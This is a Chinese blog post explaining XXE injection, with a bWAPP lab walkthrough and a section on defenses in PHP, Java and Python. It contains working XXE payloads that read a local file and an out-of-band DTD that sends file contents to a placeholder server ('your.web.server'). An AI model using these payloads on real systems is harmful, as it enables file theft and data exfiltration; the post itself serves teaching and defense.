xxe原理解析

最新推荐文章于 2024-01-06 10:12:09 发布
最新推荐文章于 2024-01-06 10:12:09 发布
阅读量147 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/d59hao/article/details/130512013
版权

一:XML格式

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
 
<?xml version="1.0" encoding="utf-8"?>  xml声明
<!DOCTYPE copyright [        DTD定义
<!ELEMENT note (to,reset,login,secret)> 定义元素
<!ENTITY test SYSTEM "file:///c://test.txt"> 定义外部实体
<!ENTITY test2 "test2"> 定义内部实体
<!TNTITY % test3 "test3"> 定义参数实体
<!ENTITY % test4 "file:///c://test.txt"> 定义参数实体
% test3;
% test4;
]
>

<to>
<reset>
<login>&test;</login>
<secret>&test2;</secret>
</reset>
</to>

参数实体是在DTD中引用,而其余实体在XML中引用;且实体定义中不能引用参数实体

二:XXE漏洞原因

XXE漏洞全称XML External Entity Injection,即XML外部实体注入漏洞。引用程序在解析XML时,如果没有禁止外部实体的加载,理论上可以加载外部文件(操作系统层面的文件),可以造成文件读取,命令执行,内网端口扫描等。以bwapp的xxe为例

1.等级为low,点击any bugs 抓包

注意这里接受的是XML数据,所以我们可以自己尝试构建实体,如果后台没有合理的解析参数,就有可以造成XXE漏洞。修改的内容,知道这里解析login参数并回显

新建外部实体并引用读取sojrs.txt文件并返回了信息

2.等级为medium,抓包

尝试xxe回显,但是数据无回显

到这里不一定没有XXE漏洞,仍然要测试是否禁用了外部实体,修改DTD,访问外部站点观察访问记录

访问记录存在,XXE漏洞存在,可利用带外通道获取数据,构造DTD如下

1
2
3
4
5
6
7
 
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE aa [
<!ENTITY % test SYSTEM "http://your.web.server/test">
%test;
%all;
]>
<reset><login>aaa</login><secret>&info;</secret></reset>

在web服务器上新建文件test,里面内容如下

1
2
 
<!ENTITY % file SYSTEM "file:///c://sojrs.txt">
<!ENTITY % all "<!ENTITY info  SYSTEM 'http://your.web.server/index.html?log=%file;'>">

请求url中带了sojrs.txt中的内容为sojrs,xxe带外通过成功获取到数据。这里要注意<!ENTITY % test SYSTEM “http://your.web.server/test">的作用是引入在外部服务器上的实体,因为在本地的解释器中有可能不允许使用外部连接,即实体定义中不允许参数实体。

3.在等级为高的情况下,利用上面的带外通道依然能够成功

三:防御方法

1.禁用外部实体
在php中,引用外部实体和libxml库有关系
libxml > 2.9 默认不解析外部实体
php:libxml_disable_entity_loader(true);
java:
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);
python:
from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

2.过滤用户提交的xml数据,如DOCTYPE;SYSTEM等

四:参考文档

https://blog.csdn.net/u011721501/article/details/43775691#commentBox
https://thief.one/2017/06/20/1/

第59号实验室
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞的产生是因为 XML 解析器对外部实体的处理不当。攻击者可以构造恶意的 XML 文档,使得服务器将任意文件读取出来。这种攻击方式称为 XXE Injection。XXE 漏洞的测试原理可以分为以下几个步骤: 首先,攻击者...
XXE超详细讲解 全网仅此一份
07-06
本文将深入讲解XXE漏洞的原理、危害、环境及检测思路。 首先,我们需要了解XML的基础概念。XML(可扩展标记语言)是一种用于数据传输和存储的语言,它采用树形结构,由自定义的标签组成,类似于HTML。然而,XML和...
[JAVA]-xml 防xxe注入 备注
小白的日常记录
09-30 7030
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet#SAXBuilder Java的 使用XML库的Java应用程序特别容易受到XXE的攻击,因为大多数Java XML解析器的默认设置是启用XXE。要安全地使用这些解析器,您必须在您使用的解析器中显式禁用XXE。下面介绍如何在最常用的J...
XXE漏洞小结
天生我才必有用!
08-28 3029
中午睡醒,被李老师急促的叫醒。赶紧看一下群里智深发的,看下我们支付有没有这个问题。听到这个声音,慌得一笔。 赶紧看看: https://mp.weixin.qq.com/s?__biz=MzIyMDEzMTA2MQ==&amp;mid=2651149767&amp;idx=1&amp;sn=8ccb13feeaa5f24764b20fd83e9fd869&amp;chksm=8c214e5db...
web渗透测试----23、XML外部实体注入--(1)XXE原理
七天
03-05 1766
XML外部实体注入漏洞
[实践总结] java XML解析防止外部实体注入
最新发布
张紫娃的博客
01-06 772
【代码】[实践总结] java XML解析防止外部实体注入。
java XML解析防止外部实体注入
weixin_30653023的博客
03-27 1991
  /** * 增加防止部实体注入逻辑 * <功能详细描述> * @param reader * @throws SAXException * @see [类、类#方法、类#成员] */ public static void setReaderFeature(SAXReader reader) ...
XXE超详细讲解(都是纯纯的干货)
weixin_63688999的博客
07-06 941
XXE (XML External Entity injection)XML 外部实体注入漏洞,如果XML 文件在引用外部实体时候,可以沟通构造恶意内容,可以导致读取任意文件,命令执行和对内网的攻击,这就是XXE漏洞,这个漏洞需要大家还有一定的XML协议基础。XML是可扩展的标记语言(eXtensible Markup Language),设计用来进行数据的传输和存储, 结构是树形结构,有标签构成,这点很像HTML语言。语法引用的外部实体,而非内部实体,那么uri中能写那些类型的外部实体呢?
第四节 XXE漏洞利用 - 任意文件读取-01
09-15
XXE漏洞是由于XML解析器对外部实体解析不当所致,攻击者可以通过构建恶意XML文件来实现文件读取、命令执行、甚至服务器控制等恶意行为。 在本节课程中,我们将讨论XXE漏洞的利用方法,特别是任意文件读取的实现。...
测试XXE注入.docx
09-06
XXE 注入(XML 外部实体注入)是一种类型的注入攻击,它会影响解析 XML 文件的应用程序。攻击者可以通过构造恶意的 XML 文件,使用外部实体来引用文件系统中的文件或网络资源,从而导致读取任意文件、执行系统命令、...
JAVA XML 解析
05-14
XML(eXtensible Markup Language)是一种用于标记数据的语言,广泛应用于数据交换、配置文件以及在Web服务中传输数据。...理解这些解析方式的原理和使用方法,是成为一名熟练的Java XML开发者的必备技能。
XSSFWorkbook 构造方法的坑
qq_42058242的博客
11-27 1312
如果Excel仅仅是作为模板来使用,不希望得到变更,不要用这种构造方式,会造成原Excel变更!!! XSSFWorkbook workbook = new XSSFWorkbook(“Excel绝对路径”);// 创建excel模板workbook, 用这种方式: FileInputStream fileInputStream = new FileInputStream(new File(“Excel绝对路径”));// 将excel模板文件转为输入流 XSSFWorkbook workbook = .
Java的XSSFWorkbook和XSSFSheet处理Excel(偷偷告诉同学们。。。)
qq_43508887的博客
10-14 7079
XSSFWorkbook、XSSFSheet对xlsx和xls都支持 public class ExcelUtil { private Map<String,Integer> map; //工作簿 private XSSFWorkbook xssfWorkbook = null; //工作表 private XSSFSheet xssfSheet = null; public ExcelUtil(){ } //获取工作簿和工作表 public ExcelUtil(InputStream
漏洞总结——XXE(XML外部实体注入)
Spontaneous_0的博客
09-08 458
XXE漏洞全称为 XML External Entity Injection,即XML外部实体注入XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载, 导致用户可以控制外部的加载文件,造成XXE漏洞。
SXSSFWorkbook XSSFWorkbook 我所遇到的坑大集合,希望能帮助更多的人。
热门推荐
LJHSkyWalker的博客
08-30 7万+
坑一:为什么模板中的数据获取不到? 当你企图使用SXSSFWorkbook去加载一个已存在的Excel模板时,首先你应该用XSSFWorkbook去获取它  XSSFWorkbook(java.io.File file) XSSFWorkbook(java.io.InputStream is) XSSFWorkbook(OPCPackage pkg) XSSFWorkbook(java.la...
java xml内容的引用,Java XML解析:避免实体引用解析
weixin_28716217的博客
03-02 108
I am currently parsing XHTML documents with a DOM parser, like:final DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();dbf.setValidating(false);final DocumentBuilder db = dbf.newDocume...
java代码审计
qq_44256371的博客
12-06 1438
java代码审计
(XML外部实体注入)XXE
weixin_42299862的博客
03-07 777
测试怎么测 一、前提条件:(1)有入口用户可上传XML (2)后台解析了XML & 允许DTD或外部实体扩展 二、测试发现漏洞点 https://xz.aliyun.com/t/3357 1、实体循环DDOS a)、发送以下XML代码到服务器,如: <!ENTITY % xx '&#x25;zz;'> <!ENTITY % zz '&#x25;xx;'&g...
XXE读取文件 Geek10th
weixin_44377940的博客
11-14 992
点开网站: 抓包,修改属性: 返回了这么一串: 由于是$name==md5(),由弱类型比较和md5想到md5碰撞,
xxe漏洞原理及防御方式
05-25
XXE漏洞的原理是通过在XML文档中插入恶意实体来触发解析器加载恶意实体,从而发起攻击。 以下是XXE漏洞的防御方式: 1.禁止使用外部实体:在解析XML文档时,应该禁止使用外部实体,避免攻击者利用外部实体来读取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值